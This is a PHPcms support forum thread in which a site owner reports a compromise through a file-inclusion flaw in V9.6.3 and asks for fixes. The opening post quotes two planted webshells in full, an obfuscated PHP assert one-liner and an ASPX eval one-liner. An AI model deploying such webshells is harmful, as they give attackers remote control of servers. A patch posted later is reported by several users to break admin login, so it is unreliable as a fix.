查看: 455|回复: 13

[反馈BUG] 我的PHPcmsV9.6.3中木马了(这个版本后台存在文件包含漏洞)

  [复制链接]
发表于 2017-10-10 17:09:47 | 显示全部楼层 |阅读模式
  • Web-server: Apache
  • PHP版本: 5.6
  • Mysql版本: 5.0.95
  • 适用版本: v9
  • 更新日期: 9.6.3
  • 编码版本: UTF-8 
  • 浏览器: IE7 IE8 firefox chrome 
  • 复现步骤: 漏洞影响范围:

    PHPcmsV9.6.3
  • 问题描述: https://help.aliyun.com/knowledge_detail/57443.html
    官方评级:

    高危

    漏洞描述:

    PHPcmsV9.6.3最新版本后台存在文件包含漏洞,攻击者可以利用该漏洞包含一句话木马,可以获取网站服务器管理权限。

    漏洞利用条件和方式:

    远程利用

    漏洞影响范围:

    PHPcmsV9.6.3

    漏洞检测:

    开发人员自查PHPcms版本是否为9.6.3版本
  • 问题截图:
今天网站异常,检查发现网站多了一些文件jiuge.php、a.aspx等,貌似中了一句话木马。

jiuge.php里面内容:<?php $k="ass"."ert"; $k(${"_PO"."ST"} [shiban]);?>九哥

a.aspx里面内容:<% @Page Language="Jscript"%><%eval(Request.Item["shiban"],"unsafe");%>xx



php 5.6,PHPcmsV9.6.3,有没有什么措施可以防范?
发表于 2017-10-10 20:18:27 | 显示全部楼层
官方没有回应!!!是不是不会补漏洞楼??
回复 支持 反对

使用道具 举报

发表于 2017-10-10 21:44:56 | 显示全部楼层
没有看出是什么问题,应该是最新的漏洞吧
回复 支持 反对

使用道具 举报

发表于 7 天前 | 显示全部楼层
阿里云有没有给出修补方法?
回复 支持 反对

使用道具 举报

 楼主| 发表于 7 天前 | 显示全部楼层
官方和阿里云都没有给出修补方法。其实漏洞很多啊!有没有修补办法??

http://www.cnvd.org.cn/flaw/list.htm?flag=true



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?点击这里注册

x
回复 支持 反对

使用道具 举报

发表于 6 天前 | 显示全部楼层
xiaoyuzhi 发表于 2017-10-12 17:32
官方和阿里云都没有给出修补方法。其实漏洞很多啊!有没有修补办法??

http://www.cnvd.org.cn/flaw/li ...

最新版本的稍微好点了吧
回复 支持 反对

使用道具 举报

发表于 6 天前 | 显示全部楼层
修复方法:

phpcms\libs\classes\param.class.php
phpsso_server\phpcms\libs\classes\param.class.php

源代码:
        public static function get_cookie($var, $default = '') {
                $var = pc_base::load_config('system','cookie_pre').$var;
                $value = isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DECODE', md5(PC_PATH.'cookie'.$var).pc_base::load_config('system','auth_key')) : $default;
                if(in_array($var,array('_userid','userid','siteid','_groupid','_roleid'))) {
                        $value = intval($value);
                } elseif(in_array($var,array('_username','username','_nickname','admin_username','sys_lang'))) { //  site_model auth
                        $value = safe_replace($value);
                }
                return $value;
        }

修改后的代码:
        public static function get_cookie($var, $default = '') {
                $var_base = $var;
                $var = pc_base::load_config('system','cookie_pre').$var;
                $value = isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DECODE', md5(PC_PATH.'cookie'.$var).pc_base::load_config('system','auth_key')) : $default;
                if(in_array($var_base,array('_userid','userid','siteid','_groupid','_roleid'))) {
                        $value = intval($value);
                } elseif(in_array($var_base,array('_username','username','_nickname','admin_username','sys_lang'))) { //  site_model auth
                        $value = safe_replace($value);
                }
                return $value;
        }
回复 支持 反对

使用道具 举报

发表于 5 天前 | 显示全部楼层
mayuhui 发表于 2017-10-13 10:55
修复方法:

phpcms\libs\classes\param.class.php

按这个方法修改后台台进不去了  登陆时  显示 登陆成功  然后又弹回来  提示  请登陆网站后台
回复 支持 反对

使用道具 举报

 楼主| 发表于 4 天前 | 显示全部楼层
今年发现的漏洞比较多
回复 支持 反对

使用道具 举报

 楼主| 发表于 4 天前 | 显示全部楼层
mayuhui 发表于 2017-10-13 10:55
修复方法:

phpcms\libs\classes\param.class.php

这个可以修复了那些漏洞?
回复 支持 反对

使用道具 举报

 楼主| 发表于 4 天前 | 显示全部楼层
zwf0792 发表于 2017-10-14 19:10
按这个方法修改后台台进不去了  登陆时  显示 登陆成功  然后又弹回来  提示  请登陆网站后台

我的网站按照上面的修改了,可以正常登陆。
回复 支持 反对

使用道具 举报

发表于 4 天前 | 显示全部楼层
xiaoyuzhi 发表于 2017-10-15 13:36
我的网站按照上面的修改了,可以正常登陆。

我直接下载官方最新版的  然后按这个改  就进不了后台了
回复 支持 反对

使用道具 举报

发表于 4 天前 | 显示全部楼层
我刚才试了下,替换后,确实进不了后台,进去就退出。
回复 支持 反对

使用道具 举报

发表于 3 天前 | 显示全部楼层
mayuhui 发表于 2017-10-13 10:55
修复方法:

phpcms\libs\classes\param.class.php

这行哟,按照你说的方法进行修改,进不去后台。一输入帐号和密码,进去后马上又弹出。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 点击这里注册

本版积分规则

小黑屋|Archiver|phpcms网站管理系统 ( 京ICP备14011169 )

GMT+8, 2017-10-19 15:10 , Processed in 0.229005 second(s), 8 queries , Memcache On.

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表